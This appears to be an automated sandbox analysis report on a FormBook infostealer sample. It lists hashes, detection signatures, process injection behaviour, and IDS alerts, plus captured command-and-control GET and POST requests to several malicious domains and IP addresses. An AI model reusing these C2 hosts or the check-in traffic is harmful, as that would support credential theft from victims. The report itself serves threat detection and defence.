Windows Analysis Report
01152-11-12-24.exe

Overview

General Information

Sample name: 01152-11-12-24.exe
Analysis ID: 1573117
MD5: be474451d52ccc6038809f5308effb59
SHA1: 0caf3ee11e31cc873aa5086ae58a8b0b90cf94b3
SHA256: c277a0bbd4efe9b14a4c880ac91b1ab7d0769ad013e67079bad402f56e260a60
Tags: exe, user-James_inthe_box

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 01152-11-12-24.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\01152-11-12-24.exe" MD5: BE474451D52CCC6038809F5308EFFB59)
    • svchost.exe (PID: 7668 cmdline: "C:\Users\user\Desktop\01152-11-12-24.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hKAQraLbCUKXj.exe (PID: 6664 cmdline: "C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • tzutil.exe (PID: 8064 cmdline: "C:\Windows\SysWOW64\tzutil.exe" MD5: 31DE852CCF7CED517CC79596C76126B4)
          • hKAQraLbCUKXj.exe (PID: 4508 cmdline: "C:\Program Files (x86)\iGTKdgArruVkXNnzIzDlFcfqfuDaIrKJrLohqThMiIBcjZZtSDLDegJPSpGePOwnWASgOqIFICaG\hKAQraLbCUKXj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5096 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ParentImage: C:\Users\user\Desktop\01152-11-12-24.exe, ParentProcessId: 7256, ParentProcessName: 01152-11-12-24.exe, ProcessCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ProcessId: 7668, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ParentImage: C:\Users\user\Desktop\01152-11-12-24.exe, ParentProcessId: 7256, ParentProcessName: 01152-11-12-24.exe, ProcessCommandLine: "C:\Users\user\Desktop\01152-11-12-24.exe", ProcessId: 7668, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-11T15:03:50.512729+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49859 | 217.160.0.113 | 80 | TCP
2024-12-11T15:03:53.179664+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49868 | 217.160.0.113 | 80 | TCP
2024-12-11T15:03:55.942073+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49874 | 217.160.0.113 | 80 | TCP
2024-12-11T15:04:14.656907+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49916 | 154.90.58.209 | 80 | TCP
2024-12-11T15:04:17.313122+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49926 | 154.90.58.209 | 80 | TCP
2024-12-11T15:04:19.984922+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49933 | 154.90.58.209 | 80 | TCP
2024-12-11T15:04:29.984933+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49955 | 38.181.21.178 | 80 | TCP
2024-12-11T15:04:32.641240+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49964 | 38.181.21.178 | 80 | TCP
2024-12-11T15:04:35.297492+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49972 | 38.181.21.178 | 80 | TCP
2024-12-11T15:04:53.733644+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 23.167.152.41 | 80 | TCP
2024-12-11T15:04:56.561078+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49985 | 23.167.152.41 | 80 | TCP
2024-12-11T15:04:59.205755+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 23.167.152.41 | 80 | TCP
2024-12-11T15:05:10.266493+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 103.75.185.22 | 80 | TCP
2024-12-11T15:05:12.922549+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49989 | 103.75.185.22 | 80 | TCP
2024-12-11T15:05:15.578838+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 103.75.185.22 | 80 | TCP
2024-12-11T15:05:25.110598+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49992 | 162.0.213.94 | 80 | TCP
2024-12-11T15:05:27.755607+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49993 | 162.0.213.94 | 80 | TCP
2024-12-11T15:05:30.482484+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49994 | 162.0.213.94 | 80 | TCP
2024-12-11T15:05:40.825659+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49996 | 161.97.168.245 | 80 | TCP

AV Detection

Source: http://www.44ynh.top/l9wb/ Avira URL Cloud: Label: malware
Source: 01152-11-12-24.exe ReversingLabs: Detection: 44%
Source: Yara match File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3117606831.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1724224119.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3117644043.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3119039119.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1725678953.0000000005150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3114871979.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1725336677.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3117803218.0000000004580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 01152-11-12-24.exe Joe Sandbox ML: detected
Source: 01152-11-12-24.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: tzutil.pdbGCTL source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hKAQraLbCUKXj.exe, 0000000A.00000002.3114857736.000000000076E000.00000002.00000001.01000000.00000005.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790005654.000000000076E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 01152-11-12-24.exe, 00000000.00000003.1278771438.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, 01152-11-12-24.exe, 00000000.00000003.1278637589.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000003.1625128286.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1627148015.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1725365860.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 0000000B.00000003.1727279246.000000000373C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3117979658.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000003.1724054396.000000000358F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: tzutil.exe, 0000000B.00000002.3115425477.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000B.00000002.3118417486.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000C.00000000.1790635169.00000000029DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2016740097.0000000035A4C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: tzutil.pdb source: svchost.exe, 00000007.00000003.1690915091.0000000003226000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1690729998.000000000321B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000003.1660608819.000000000162B000.00000004.00000020.00020000.00000000.sdmp, hKAQraLbCUKXj.exe, 0000000A.00000002.3116655155.0000000001636000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0095445A
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095C6D1 FindFirstFileW,FindClose, 0_2_0095C6D1
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0095C75C
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0095EF95
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0095F0F2
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0095F3F3
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_009537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_009537EF
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_00953B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00953B12
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_0095BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0095BCBC
Source: C:\Windows\SysWOW64\tzutil.exe Code function: 11_2_030AC8A0 FindFirstFileW,FindNextFileW,FindClose, 11_2_030AC8A0
Source: C:\Windows\SysWOW64\tzutil.exe Code function: 4x nop then xor eax, eax 11_2_03099EA0
Source: C:\Windows\SysWOW64\tzutil.exe Code function: 4x nop then mov ebx, 00000004h 11_2_036D04CE

Networking

Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49874 -> 217.160.0.113:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49859 -> 217.160.0.113:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49926 -> 154.90.58.209:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49955 -> 38.181.21.178:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49964 -> 38.181.21.178:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 217.160.0.113:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49916 -> 154.90.58.209:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49989 -> 103.75.185.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 103.75.185.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 162.0.213.94:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 23.167.152.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49993 -> 162.0.213.94:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49933 -> 154.90.58.209:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 23.167.152.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 103.75.185.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 23.167.152.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 161.97.168.245:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49972 -> 38.181.21.178:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 162.0.213.94:80
Source: Joe Sandbox View IP Address: 162.0.213.94
Source: Joe Sandbox View IP Address: 217.160.0.113
Source: Joe Sandbox View IP Address: 23.167.152.41
Source: Joe Sandbox View ASN Name: ACPCA
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\01152-11-12-24.exe Code function: 0_2_009622EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_009622EE
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Content-Encoding: gzip
  Content-Type: text/html; charset=UTF-8
  Date: Wed, 11 Dec 2024 14:04:14 GMT
  Server: nginx
  Vary: Accept-Encoding
  Content-Length: 44
  Connection: close
  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
  Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Content-Encoding: gzip
  Content-Type: text/html; charset=UTF-8
  Date: Wed, 11 Dec 2024 14:04:17 GMT
  Server: nginx
  Vary: Accept-Encoding
  Content-Length: 44
  Connection: close
  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00
  Data Ascii: KLIU(WHO-QHKM.g
Source: global traffic HTTP traffic detected:
  GET /q3v1/?rLx0p=06jDTp00Q&9rKHjDxP=fC5DX2ZaB+U22tqYS+31DCM0Vrm4Elo0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfcmXJHPof67iEk5v1Y4XZGEVpYnTZiVigeHb+dSitYw1T+PjPtStOlFWH8 HTTP/1.1
  Host: www.supernutra01.online
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic HTTP traffic detected:
  GET /m5si/?9rKHjDxP=eqY3hh7t27bJ5LQcNwCEIywmzarZF02UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcn2k/dwiDu7fbQ4+QluVQl8FQgs02h3ek4MsPNmfC+au8Zmg3P0HGq0iPg&rLx0p=06jDTp00Q HTTP/1.1
  Host: www.prestigerugz.info
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic HTTP traffic detected:
  GET /521z/?9rKHjDxP=Yx3A360WU89Z0GGKhcjTsfSOrSBN5i2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/G2BSEq3A6jonlAGxKbazJEUegoNulYJrFScZeGEO6SiohwMlB95u5jWi&rLx0p=06jDTp00Q HTTP/1.1
  Host: www.jijievo.site
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic HTTP traffic detected:
  GET /l9wb/?9rKHjDxP=dKoVDaTSZmwFjIfkW8eCOVVdW49NdaF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvxumUtdp8gpSZ+pYO0AiTerbcUhpiZvFAaWm7Nt0Fw8mr3zjcUwdfloZd&rLx0p=06jDTp00Q HTTP/1.1
  Host: www.44ynh.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic HTTP traffic detected:
  GET /q34f/?9rKHjDxP=dUs1zx3MtgRbplDUvpUvYjuAQD0vmGuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9erFxSPIl4knKdLfgwmO1oEe1lTFw6B1+2EJs+fQO6G9vPzlr5NjlOo8Ha&rLx0p=06jDTp00Q HTTP/1.1
  Host: www.75178.club
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic HTTP traffic detected:
  GET /syud/?9rKHjDxP=gwko4eFZldhJcfMpXUu8nEIrrsK3aSdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVZSHwmSCiW0eRqUFBT2gRXL1+O05pXEJ5/rwABmaKZBakYxfHeQS7sPZ1&rLx0p=06jDTp00Q HTTP/1.1
  Host: www.taxitayninh365.site
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic HTTP traffic detected:
  GET /wr6c/?9rKHjDxP=P2ZEIELZ0UPa04kV9W8ohJ98vIa20Z9FlTIQAlVGqe01bp+GVEKkI1C60uSAlmlZ1ff3ZHYqpSh2Ykr2aNLluv5rxVbcwMo5N3ddLCq6QLz9p/hlfUxJPhq7oCzYOhUfK96Ibl0PndwU&rLx0p=06jDTp00Q HTTP/1.1
  Host: www.ontherise.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
Source: global traffic DNS traffic detected: DNS query: www.supernutra01.online
Source: global traffic DNS traffic detected: DNS query: www.prestigerugz.info
Source: global traffic DNS traffic detected: DNS query: www.buckser.info
Source: global traffic DNS traffic detected: DNS query: www.jijievo.site
Source: global traffic DNS traffic detected: DNS query: www.44ynh.top
Source: global traffic DNS traffic detected: DNS query: www.setwayidiomas.online
Source: global traffic DNS traffic detected: DNS query: www.75178.club
Source: global traffic DNS traffic detected: DNS query: www.taxitayninh365.site
Source: global traffic DNS traffic detected: DNS query: www.ontherise.top
Source: global traffic DNS traffic detected: DNS query: www.nb-shenshi.buzz
Source: unknown HTTP traffic detected:
  POST /m5si/ HTTP/1.1
  Host: www.prestigerugz.info
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate, br
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Cache-Control: no-cache
  Content-Length: 221
  Origin: http://www.prestigerugz.info
  Referer: http://www.prestigerugz.info/m5si/
  User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
  Data Ascii: 9rKHjDxP=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzTHMFt223gtXWdg0k62bHJ2YvwOBSSsINNtIBbbCppEGMwz2yw==
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Date: Wed, 11 Dec 2024 14:03:50 GMT
  Server: Apache
  X-Frame-Options: deny
  Content-Encoding: gzip
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Date: Wed, 11 Dec 2024 14:03:52 GMT
  Server: Apache
  X-Frame-Options: deny
  Content-Encoding: gzip
